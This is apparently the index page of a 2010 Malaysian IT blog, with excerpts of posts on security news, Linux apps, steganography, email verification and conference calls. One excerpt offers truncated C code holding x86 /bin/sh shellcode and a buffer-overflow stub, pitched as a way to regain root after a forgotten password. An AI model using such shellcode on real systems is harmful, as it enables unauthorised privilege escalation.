My experience on my daily works... helping others ease each other

Thursday, December 30, 2010

SANS: The Top Cyber Security Risks

SANS: The Top Cyber Security Ri...
Share:

Friday, December 10, 2010

eniaga - Good Initiative but Worst Implementation

Have you come across new government initiatives? eNiaga. It seem that either the company providing that portal is just wanna get money and deliver a portal or don't care about money (which I guarantee the company gets lots of money) but just wanna deliver a portal to help government...
Share:

10 obscure Linux office applications to try

If you've ever checked out the list of applications available for the Linux operating system (OS), you know there are tons of them out there. The only problem is determining which ones are worth trying. This is especially true of office applications. You could dig through those apps for hours just to come up with a handful of gems. So I thought...
Share:

Google Chrome Notebook - Is it safe?

I received a video from a friend of my via facebook. It was about Google Chrome Notebook. Here is the video What I would like to discuss here is the security concern when using this. No doubt that this will save us a lot especially there will no worries of losing unfinished work when your machine crash and no worries of carrying extra hard-disk...
Share:

Wednesday, December 8, 2010

Steganography - What you need to know

Steganographyby CyberSecurity Malaysia on Wednesday, December 8, 2010 at 3:36pmQ: How to detect steganography image? A: Steganography images cannot be seen with the human eyes, only a piece of software was able to detect it. The difference between the images is not noticeable to the human eye what so ever. Two files look almost identical apart...
Share:

Monday, December 6, 2010

Malaysia: IT Salary Benchmark 2010

ZDNet Asia conducted an online survey between October 2009 and November 2010, to gain insights into salary trends and the IT workforce in Asia. The study polled a total of 14,998 respondents from various sectors including government, healthcare, IT, services, telecommunications,...
Share:

Sunday, November 28, 2010

World Computer Security Day 2010

This year theme is Managing Risk 53 ways to participate/observe the Computer Security Day ...
Share:

Wednesday, November 24, 2010

How to verified email address? A way to prevent scam, spam, etc

How to Verify an Email Address?How do you verify if a given email address is real or fake? Well an obvious solution is that you send a test mail to that email address and if your message doesn’t bounce, it is safe to assume* that the address is real. [*] Some web domains may have configured a catch-all email address meaning that messages addressed...
Share:

Saturday, November 20, 2010

Bing Bar Causing IE failed to close

I did install Microsoft bing bar to allow me to access Microsoft search capability and others tools in IE. It works fine for quite sometimes. However, last few days, I was unable to close the IE. I did end the process at Task Manager and do lots of things as suggested (check for malware, adware, spyware, etc) but nothing could solve the problem. Then...
Share:

Friday, November 19, 2010

WiTopia - Is it safe?

I read a recent articles on protecting yourself from firesheep (a mozilla plugin that meant for good but becoming as a tool for hackers). Read the articles here. The author that link the articles to another articles he wrote at blog.techrepublic.Here he explains on how WiTopia could provide a secure tunnel between the client and the server that the...
Share:

Browser contains serious bugs

Chrome, Safari, Office top list for serious bugsBy Elinor Mills, CNET News.com on November 17, 2010 (2 days 5 minutes ago) Chrome was the application with the most number of high-severity vulnerabilities that impacted end users this year, followed by Safari, Microsoft Office, Adobe Reader and Acrobat, and Firefox, according to a list to be released...
Share:

Cambridge Brain Science

Test your brain how it works http://cbstrials.com/Open/Default.aspx?B_ID=...
Share:

Wednesday, November 17, 2010

For good purpose but with bad implications

If you forgot your root password and wish to access it to change... They code below can be used :)#include "string.h"#include "stdio.h"char shellcode[] ="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b""\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd""\x80\xe8\xdc\xff\xff\xff/bin/sh";char large_string[128]; int main(int...
Share:

Friday, November 12, 2010

Looking for tool to derive AST from Source Code

I'm looking for a program (or source code written either using java or C language) which be able to take source-code (single or multiple file) and establish AST (abstract syntax tree), PDG (Program Dependency Graph), and CFG (Control Flow Graph). I've been searching quite sometime but has yet to found any. Most of the tool I found take executable...
Share:

Tips & Trick for setting up OpenVPN

Having a virtual private network affords a lot of convenience, particularly for those who want or need to access a remote network from a different location, such as connecting to a work network from home, or vice versa. With the availability of 3G on the road, or wireless hotspots everywhere, being able to connect, securely, to a remote private...
Share:

Thursday, November 11, 2010

ALMUC 2010 Penang

Almuc 2010 Penang ALMUC 2010 Penang is organized by myVSTS, a charter established in TechNation. myVSTS is a community group of Visual Studio users focused on Application...
Share:

Free E Book

Free eBook: Moving to Microsoft Visual Studio 2010 Still using Visual Studio 2008? Oops, you said 2005? Maybe 2003? We're pleased to announce another free offering from Microsoft Press (336 page...
Share:

JCIT & JDCTA (Journal)

JCIT & JDCTA(EI cited): : Call for Papers and Special (Invited) Issues JDCTA: http://www.aicit.org/jdcta JCIT: http://www.aicit.org/jcit Citation: EI, INSPEC, DBLP, Google Scholar, DOI, Computer and Information Systems Abstracts It is our pleasure to invite you to submit Papers, Invited (Special) Issue proposal to JCIT & JDCTA. ISSN...
Share:

The 3rd Conference on Data Mining and Optimization

DMO’11: The 3rd Conference on Data Mining and Optimization 28 & 29 June 2011, Putrajaya, Malaysia http://dmo.ukm.my/dmo11/ [Technical Co-sponsors: IEEE & IEEE Computer Society] ======================================   We would like to invite you and you colleagues to participate and present a research article at the 3rd Conference...
Share:

2011 Information Technologies, Management and Digital World (NCM series)

2011 International Conferences in Korea(May Conferences) 2011 Information Technologies, Management and Digital World (NCM series) Call for Program Committee Members/Workshops/Invited Sessions/Chairs/Papers- Dates and Venue: May 11-13, 2011, Hilton Hotel Gyeongju, Gyeongju, Korea NCM2011: 7th International Conference on Networked Computing and...
Share:

About Me

Somewhere, Selangor, Malaysia
An IT by profession, a beginner in photography

Labels

Blog Archive

Blogger templates